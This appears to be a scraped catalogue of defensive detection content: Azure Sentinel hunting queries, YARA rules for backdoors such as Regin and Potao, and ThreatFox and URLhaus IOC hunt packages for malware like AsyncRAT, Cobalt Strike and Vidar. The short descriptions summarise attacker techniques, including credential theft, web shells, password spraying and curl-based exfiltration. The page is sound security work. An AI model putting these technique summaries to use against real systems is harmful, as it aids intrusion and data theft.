backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1071T1048
CommonSecurityLogDnsEventsVMConnection

'This query helps identify rare DNS connections and resulting data transfer to/from the associated domain. It can help identify unexpected large data transfers to or from internal systems which may in

huntingmicrosoftofficial
Azure-Sentinel source
T1190T1078
SecurityAlertSecurityEvent

'This query looks at correlating different reconnaissance alerts with interactive logon logs to help analysts investigate initial possible compromise activity'

huntingmicrosoftofficial
Yara-Rules source

Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2

aptcommunity
Yara-Rules source

Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2

aptcommunity
Yara-Rules source

Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2

aptcommunity
Yara-Rules source

Auto-generated rule - file-3665415_sys

backdoorcommunity
Yara-Rules source

Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin

backdoorcommunity
Yara-Rules source

Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129

backdoorcommunity
Yara-Rules source

Auto-generated rule - file SHF-000052 and ndisips.sys

backdoorcommunity
Yara-Rules source

Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935

backdoorcommunity
Yara-Rules source

Detects svcstat from Regin report - file svcsstat.exe_sample

community
Scieron
yara low
Yara-Rules source

YARA rule: Scieron

community
Azure-Sentinel source
T1098.001T1528
AuditLogs

Identifies service principal sign-ins occurring within 30 minutes of a credential addition to the same service principal. The tight correlation is consistent with post-compromise staging where credent

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1110.003T1078
AADNonInteractiveUserSignInLogsSigninLogs

Hunt for IP addresses that fail sign-ins against multiple identities and then authenticate successfully within a short time window. This can highlight password spraying or credential misuse patterns a

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1550.001T1539
AADNonInteractiveUserSignInLogsSigninLogs

Identify successful sign-ins where a non-interactive sign-in for the same user occurs within 10 minutes from a different ASN and IP than the interactive sign-in. This pattern can indicate post-comprom

huntingmicrosoftofficial
Azure-Sentinel source
T1190T1078
AuditLogsCommonSecurityLogSecurityAlert

'This query combines different SQL alerts with CommonSecurityLogs and AuditLogs, helping analysts investigate any possible SQL-related attacks faster, thus reducing Mean Time To Respond'

huntingmicrosoftofficial
Azure-Sentinel source
T1586T1570
AuditLogsAzureActivitySigninLogs

'This query identifies attackers trying to enumerate the Storage keys as well as updating roles, using AzureActivity, SigninLogs and AuditLogs'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1586T1570
CommonSecurityLogSecurityAlert

'This query combines different Storage alerts with CommonSecurityLogs and StorageLogs, helping analysts triage and investigate any possible Storage-related attacks faster, thus reducing Mean Time To R

huntingmicrosoftofficial
Azure-Sentinel source
T1190T1078
AuditLogsCommonSecurityLogSecurityAlert

'This query combines different Storage alerts with CommonSecurityLogs and AuditLogs, helping analysts investigate any possible storage-related attacks faster, thus reducing Mean Time To Respond'

huntingmicrosoftofficial
Azure-Sentinel source
T1078T1087
AuditLogsSigninLogs

'This hunting query will help detect successful sign-ins from devices that are marked non-compliant along with bulk download activity. Attackers may attempt to get a list of accounts, groups, registra

backdoorhuntingmicrosoftofficial
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network scans targeting unpatched devices on specific IP:port combinations, often leveraging open ports like 23 (Tel

elf-miraiiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 11 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 14 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 11 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox: magecart IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 24 IOCs associated with magecart

iocjs-magecartthreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 20 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 3 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 22 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 14 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with CountLoader

iocthreatfoxwin-count_loader
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

DCRat is a remote access Trojan that enables attackers to exfiltrate data and execute commands on infected systems. It typically arrives via compromised networks or phishing emails, leveraging IP:port connections to establish command-and-control communication. SOC analysts should monitor for unusual outbound

backdooriocthreatfoxwin-dcrat
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 13 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised credentials to access and exfiltrate

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 119 IOCs associated with VShell

iocthreatfoxwin-vshell
Azure-Sentinel source
T1078T1110
AuditLogsOfficeActivitySecurityEventSigninLogsSyslogWindowsEvent

'This script identifies password changes or resets across multiple host and cloud sources. Account manipulation, including password changes and resets, may help adversaries maintain access to credenti

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1078T1087
OfficeActivitySecurityAlertSecurityEventSigninLogsW3CIISLog

'This query determines rare activity by a high-value account on a system or service. If any account with rare activity is found, the query retrieves related activity from that account on the same day

huntingmicrosoftofficial
Azure-Sentinel source
T1190T1078
AuditLogsSecurityAlertSigninLogs

'This query looks for unfamiliar sign-ins that have not been seen recently for the given user, combined with Azure portal login attempts and audit logs, to help detect and reduce the analysis timeline for defenders'

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 134-209-188-142

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 57 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "ascii" malware family is a downloader that exfiltrates data and establishes command-and-control (C2) communication

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as MassLogger

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as PureHVNC

iocurlhaus
Azure-Sentinel source
T1098T1078T1496
AuditLogsAzureActivity

'Identifies when a new user is granted access and starts creating resources in Azure. This can help you identify rogue or malicious user behavior.'

huntingmicrosoftofficial
Azure-Sentinel source
SecurityAlertW3CIISLog

'Extracts MDATP Alerts that indicate a command was executed by a web shell. Uses time window based querying to identify the potential web shell location on the server, then enriches with Attacker IP a

huntingmicrosoftofficialwebshell
Azure-Sentinel source
SecurityAlertW3CIISLog

'Extracts MDATP Alerts for a web shell being placed on the server and then enriches this event with information from W3CIISLog to identify the attacker that placed the shell'

huntingmicrosoftofficialwebshell
Azure-Sentinel source
T1496
AzureActivity

'Indicates when an anomalous number of resources are created in Azure via AzureActivity log. Resource creation could indicate malicious or spurious use of your Azure Resource allocation.'

huntingmicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Identifies anomalies in sign-in events based on the volume of sign-in events over time. Use this to identify suspicious authentication patterns such as spikes in activity or out-of-hours events. Ref :

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1570T1078.004
AzureActivityDeviceEventsDeviceFileEvents

'Identifies any Azure VM Run Command operations and links these operations with MDE host logging. Linking these two data sources provides hunting opportunities. Logging from AzureActivity provides the

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query checks for network connection failures to Microsoft Defender for Endpoint URLs. The output includes any device with 1+ connectivity failures, a list of the domains they failed to connect to

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query is designed to help troubleshoot connectivity issues to Microsoft Defender for Endpoint URLs. It provides a summary of the number of failures which occurred, the number of distinct machines

huntingmicrosoftofficial
Azure-Sentinel source
T1078T1490
AuditLogsDeviceProcessEventsIdentityInfoSecurityEventWindowsEvent

'This query could identify critical user management operations like user registration (Microsoft Entra ID Multi-Factor Authentication & self-service password reset (SSPR)) authentication by admin accou

backdoorhuntingmicrosoftofficialpersistenceransomware
Azure-Sentinel source

This advanced hunting query detects CISA Alert (AA22-117A) 2021 Top Routinely Exploited Vulnerabilities https://www.cisa.gov/uscert/ncas/alerts/aa22-117a

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

// Author: jan geisbauer // @janvonkirchheim // ------------------------ // 1. A list of all devices that have this vulnerability // 2. A list of all users that use those devices // 3. If these users

exploithuntingmicrosoftofficial
Azure-Sentinel source
EmailAttachmentInfoIdentityInfo

// Author: jan geisbauer // @janvonkirchheim // ------------------------ // 1. A list of all devices that have this vulnerability // 2. A list of all users that use those devices // 3. If these users

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1098
AuditLogsSigninLogs

'This query looks for Service Principal accounts that are no longer used where a user has added or updated credentials for them before logging in with the Service Principal. Threat actors may look to

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1098
AuditLogsSigninLogs

'This query looks for user accounts that have not been successfully logged into recently, which then have an MFA method added or updated before logging in. Threat actors may look to re-activate dormant

huntingmicrosoftofficial
Azure-Sentinel source
T1098
AuditLogsBehaviorAnalyticsSigninLogs

'This query looks for accounts that have not been successfully logged into recently which then add or update an MFA method before logging in. Threat actors may look to re-activate dormant accounts and us

huntingmicrosoftofficial
Azure-Sentinel source
T1071
DeviceNetworkEventsSecurityEvent

'Threat actors may use tools such as Curl to download additional files, communicate with C2 infrastructure, or exfiltrate data. This query looks for new files being downloaded using Curl. Curl also ha

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source

'This query will identify the Microsoft Defender Antivirus Security Intelligence version, Security Intelligence up to date value, Engine version, Engine up to date value, Product version (aka Platfor

huntingmicrosoftofficial
Azure-Sentinel source

'Provides the Engine version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the Engine version.'

huntingmicrosoftofficial
Azure-Sentinel source

'Provides the antivirus mode and the device count falling under that AV mode.'

huntingmicrosoftofficial
Azure-Sentinel source

'Provides the Platform version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the Platform version.'

huntingmicrosoftofficial
Azure-Sentinel source

'Provides the Security Intelligence version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the security intelligence versi

huntingmicrosoftofficial
Prikormka
yara low
Yara-Rules source

YARA rule: Prikormka

community
PrikormkaDropper
yara low
Yara-Rules source

The YARA rule 'PrikormkaDropper' detects a potential malicious dro

community
Yara-Rules source

YARA rule: PrikormkaEarlyVersion

community
PrikormkaModule
yara low
Yara-Rules source

YARA rule: PrikormkaModule

community
Azure-Sentinel source
T1078.004
AADNonInteractiveUserSignInLogsIdentityInfoSigninLogs

' Identifies failed MFA attempts from Privileged accounts. Privileged accounts list can be based on IdentityInfo UEBA table or built-in watchlist. Ref : https://docs.microsoft.com/azure/active-directo

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Kimwolf malware operates as a backdoor, enabling remote command execution and data exfiltration via encrypted C2 channels over IP:port pairs. It typically arrives through phishing emails with malicious attachments or exploit kits leveraging zero-day vulnerabilities. SOC analysts should monitor for unusual outbound traffic patterns, lateral movement indicators, and signs of persistence beyond the listed IOCs.

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents

The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via phishing emails, malicious websites

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents

Hunt package for 3 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 82 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

AsyncRAT is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent control over infected systems. It typically arrives via phishing emails, malicious attachments, or exploit kits, leveraging IP:port pairs for command-and-control communication. SOC analysts should monitor for unusual outbound traffic to listed IPs/ports, signs

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Eye Pyramid

iocthreatfoxwin-eye_pyramid
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting banking credentials and system information

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 33 IOCs associated with VShell

iocthreatfoxwin-vshell
Yara-Rules source

YARA rule: Trojan_Win32_Plabit

backdoorcommunity
Dipsind variant
yara low
Yara-Rules source

Dipsind variant

community
Dipsind variant
yara low
Yara-Rules source

Dipsind variant

community
Yara-Rules source

Installer for Dipsind variant

community
Zc tool
yara low
Yara-Rules source

Zc tool

community
Zc tool v2
yara low
Yara-Rules source

Zc tool v2

community
Yara-Rules source

Injector / loader component

community
JPin backdoor
yara low
Yara-Rules source

JPin backdoor

backdoorcommunity
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 67 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 13 malicious URLs tagged as ClearFake

iocurlhaus
Yara-Rules source

Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)

community
Misdat Backdoor
yara low
Yara-Rules source

YARA rule: Misdat_Backdoor

backdoorcommunity
Yara-Rules source

The "Misdat_Backdoor_Packed" YARA rule detects potential malicious payloads associated with the Misdat back

backdoorcommunity
Yara-Rules source

YARA rule: MiSType_Backdoor_Packed

backdoorcommunity
Yara-Rules source

CCProxy config known from Operation Cleaver

backdoorcommunity
Potao
yara low
Yara-Rules source

The 'Potao' YARA rule detects potential malicious artifacts or indicators associated with the name 'Potao', likely targeting specific threat actors or campaigns. SOC teams should deploy this rule in endpoint EDR scanning

community
PotaoDecoy
yara low
Yara-Rules source

YARA rule: PotaoDecoy

community
PotaoDll
yara low
Yara-Rules source

YARA rule: PotaoDll

community
PotaoSecondStage
yara low
Yara-Rules source

YARA rule: PotaoSecondStage

community
PotaoUSB
yara low
Yara-Rules source

YARA rule: PotaoUSB

community
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
SType Backdoor
yara low
Yara-Rules source

The SType_Backdoor rule detects a sophisticated backdoor variant associated with advanced persistent threat (APT) campaigns, leveraging indicators linked to

backdoorcommunity
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents

Hunt package for 3 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

XMRIG is a cryptocurrency mining malware that leverages compromised systems to mine Monero, often deploying stealthily to avoid detection. It typically arrives via phishing emails, malicious websites, or exploit kits, using URLs and IP:port connections to establish command-and-control channels. SOC analysts should monitor for unusual CPU usage, unexpected outbound network traffic, and signs of cryptocurrency mining activities beyond the listed IOCs.

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 78 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 44 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 21 IOCs associated with Unknown malware

